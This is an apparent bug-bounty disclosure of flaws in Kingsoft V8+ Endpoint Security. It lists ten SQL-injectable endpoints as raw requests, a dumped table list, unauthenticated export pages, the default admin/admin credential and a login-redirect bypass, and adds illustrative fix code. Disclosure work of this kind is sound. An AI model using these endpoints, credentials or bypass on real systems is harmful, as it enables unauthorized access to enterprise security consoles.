2016-03-01: Details reported to the vendor; awaiting the vendor's handling
2016-03-01: Vendor confirmed; details disclosed to the vendor only
2016-03-04: Details opened to third-party security partners (NSFOCUS 绿盟科技, 唐朝安全巡航, 无声信息)
2016-04-25: Details opened to core white hats and experts in the relevant fields
2016-05-05: Details opened to ordinary white hats
2016-05-15: Details opened to intern white hats
2016-05-30: Details opened to the public

Kingsoft V8+ Endpoint Security System: 10 SQL injections + insecure default configuration + admin backend authorization bypass

Let's look at the product introduction first.

There are quite a few SQL injections; the 10 are as follows:
1.
POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

2.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 408
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

3.
POST /report/report/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 205
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}

4.
POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 409
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

5.
POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

6.
POST /boundary_manage/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 372
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D
Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}

7.
POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

8.
POST /settings/system/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

9.
POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}

10.
POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 288
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}
Database: SQLite_masterdb
[69 tables]
+-----------------------------+
| ArpClientMacIp              |
| ArpInfo                     |
| ArpInfo_History             |
| ArpOptions                  |
| BDLogManagerOptions         |
| BoundaryOptions             |
| ClientDelete                |
| ClientInfoCollect           |
| ClientScanFinishInfo        |
| ClientStaInfo               |
| ClientUpdateOptions         |
| ClientVersionInfo           |
| ClientVirusCollect          |
| DefaultPopedom              |
| DomainGroupInfo             |
| GroupInfo                   |
| HostInfo                    |
| HostSoftLeakScanInfo        |
| HostSysLeakScanInfo         |
| IPFilter                    |
| KChildSysCenterIPInfo       |
| KClearOpenOptions           |
| KFilePushInfo               |
| KForbidSoftInfo             |
| KGroupIP                    |
| KLncncCompanyInfo           |
| KReport                     |
| KSimpleSoftInfo             |
| KSoftUninstallStrategy      |
| KSoftWareMgrOptions         |
| KUninstallSoftInfo          |
| KVDeviceGroupIP             |
| KVDeviceGroupInfo           |
| KVDipatcherPlanTask         |
| KVMEngineOptions            |
| LeakRepairStategy           |
| LeakScanRepairCmd           |
| MailMonOptions              |
| MailMonVirusInfo            |
| NetWorkManagerInfo          |
| ReportIndex                 |
| ReportOnlineIPSet           |
| ReportStrategy              |
| RootWhiteListInfo           |
| SCMessageLog                |
| SCOperLog                   |
| SCOperation                 |
| SCUser                      |
| ScanConfigOptions           |
| ScanOptions                 |
| StrongManagerOptions        |
| SysMonitorOpt               |
| SystemCenterTree            |
| TaskOptions                 |
| UDiskAgentOptions           |
| UDiskOptions                |
| USBOptions                  |
| UninstallKavClientIPs       |
| UserPopedom                 |
| VHierarchyBaseVirusDealInfo |
| VHierarchyInfo              |
| VHierarchySetupInfo         |
| VirusCountInfo              |
| VirusInfo                   |
| ViuusInfoCollect            |
| WatchOptions                |
| _GroupInfo_old_20131010     |
| sqlite_sequence             |
| webconfig                   |
+-----------------------------+
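Every injectable request above carries its parameters in a JSON body (mode_id, VHierarchyID, search_text and so on), and the backend is SQLite. The following is an added example, not the product's code: the flaw class (a JSON field spliced into the SQL text) beside the parameterized and allowlisted form. GroupInfo is a table name from the enumeration above; its columns, rows and the handler names are assumptions for this example.

```python
import json
import re
import sqlite3

# Constructed stand-in for the product's SQLite database. GroupInfo is a table
# name from the report; its columns and rows are assumptions for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE GroupInfo (group_id INTEGER, group_name TEXT, mode_id TEXT)")
    db.executemany("INSERT INTO GroupInfo VALUES (?, ?, ?)", [
        (1, "Default", "B92441F0-B325-453C-9758-111D7AB69190"),
        (2, "Other", "00000000-0000-0000-0000-000000000000"),
    ])
    return db

# mode_id is a GUID in every request in the report, so an allowlist on its
# shape can be enforced before the value gets anywhere near the database.
GUID_RE = re.compile(r"^[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}$")

def get_group_list_vulnerable(db, body):
    # Flaw class from the report: a JSON field is spliced into the SQL text.
    cmd = json.loads(body)["get_group_list_cmd"]
    sql = "SELECT group_id, group_name FROM GroupInfo WHERE mode_id = '%s'" % cmd["mode_id"]
    return db.execute(sql).fetchall()

def get_group_list_fixed(db, body):
    cmd = json.loads(body)["get_group_list_cmd"]
    mode_id = cmd["mode_id"]
    if not GUID_RE.match(mode_id):
        raise ValueError("mode_id is not a GUID")
    # Parameter binding: the value travels separately from the SQL text.
    return db.execute(
        "SELECT group_id, group_name FROM GroupInfo WHERE mode_id = ?", (mode_id,)
    ).fetchall()

def outcome(handler, body):
    """Run a handler on a fresh database; return the rows or the exception name."""
    try:
        return handler(make_db(), body)
    except Exception as exc:
        return type(exc).__name__

# Body of finding 1, and a copy whose mode_id has a stray quote appended (a
# malformed value, not a payload) to show how each handler reacts to it.
GOOD = ('{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D",'
        '"mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}')
BAD = GOOD.replace('69190","VHierarchyID"', '69190\'","VHierarchyID"')

if __name__ == "__main__":
    for name, body in (("good", GOOD), ("quote", BAD)):
        print(name, outcome(get_group_list_vulnerable, body), outcome(get_group_list_fixed, body))
```

The vulnerable handler fails with a database error on the malformed value (the same reaction a scanner keys on), while the fixed one rejects it before any SQL runs and returns the same rows for the well-formed request.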
Insecure default configuration: the system has directory listing enabled by default. A few examples:

http://**.**.**.**/boundary_manage/
**.**.**.**:6868/active_defense/
**.**.**.**:6868/report/
http://**.**.**.**/active_defense/
**.**.**.**:6868/settings/

There are many more that are not listed here; a few cases were found as proof.

It then turned out that many pages can be accessed without authorization. Since there are a lot of pages, I did not try them one by one; the vendor should apply a uniform restriction. Files with "excel" in the name download the corresponding data directly. A few examples:

**.**.**.**:6868/active_defense/scan/task.php
**.**.**.**:6868/active_defense/scan/export.php
**.**.**.**:6868/report/log/excel2.php
**.**.**.**:6868/report/log/analyse.php
**.**.**.**:6868/report/log/date_select.php
**.**.**.**:6868/report/log/excel.php
**.**.**.**:6868/report/general/ksafecount.php
http://**.**.**.**/active_defense/scan/task.php
http://**.**.**.**/boundary_manage/boundary_file_report.php

Incidentally, the admin backend has the default credential admin/admin.

The unauthorized access above exposed only limited data, so after some further testing it turned out the admin backend can be bypassed completely... Every page in the system checks on access whether the user is logged in, with the following request:
GET /login.php HTTP/1.1
Host: **.**.**.**:6868
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8

This request redirects to the login page, so simply intercepting that URL in Fiddler bypasses the check.

One can view the system configuration and passwords, modify the announcement (and the announcement field has XSS), and upload popular tools... Here is the result:
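The bypass works because the protected page is rendered first and the browser is only sent to /login.php afterwards, so the decision lives on the client. Below is an added example (not the product's code) modelling that pattern beside the server-side, deny-by-default check that closes it and also covers the export pages listed earlier. The paths come from the report; the session store, credential and handler names are constructed for this example.

```python
import secrets

# Constructed session store and credential; the product's real scheme is not
# known. Paths are taken from the report.
SESSIONS = {}                                    # PHPSESSID value -> username
PUBLIC = ("/login.php", "/static/")              # everything else needs a session
ADMIN_CREDENTIAL = ("admin", "PLACEHOLDER_NOT_THE_DEFAULT")

def login(username, password):
    """Issue a session only for a valid credential (real code checks a hash)."""
    if (username, password) != ADMIN_CREDENTIAL:
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return sid

def has_session(cookies):
    return cookies.get("PHPSESSID") in SESSIONS

def is_public(path):
    return path == PUBLIC[0] or path.startswith(PUBLIC[1])

def render(path):
    return "<html>data behind %s</html>" % path

def serve_client_checked(path, cookies):
    """The pattern the report describes: the page is rendered regardless and
    the browser is then told to visit /login.php, so blocking that follow-up
    request in a proxy leaves the content readable."""
    body = render(path)
    if not has_session(cookies):
        body += "<script>location='/login.php'</script>"
    return 200, body

def serve_server_checked(path, cookies):
    """Fix: decide before rendering, for every non-public path (export pages
    such as report/log/excel.php included), and send no content on failure."""
    if not is_public(path) and not has_session(cookies):
        return 302, ""                           # with Location: /login.php
    return 200, render(path)

if __name__ == "__main__":
    print(serve_client_checked("/report/log/excel.php", {}))
    print(serve_server_checked("/report/log/excel.php", {}))
```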
Filtering + permission checks

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2016-03-01 20:06

Thank you for your attention to Kingsoft security; this has been passed to the business team to follow up on a fix. Thanks for the submission.

None yet

Front row, paying respects to master niliu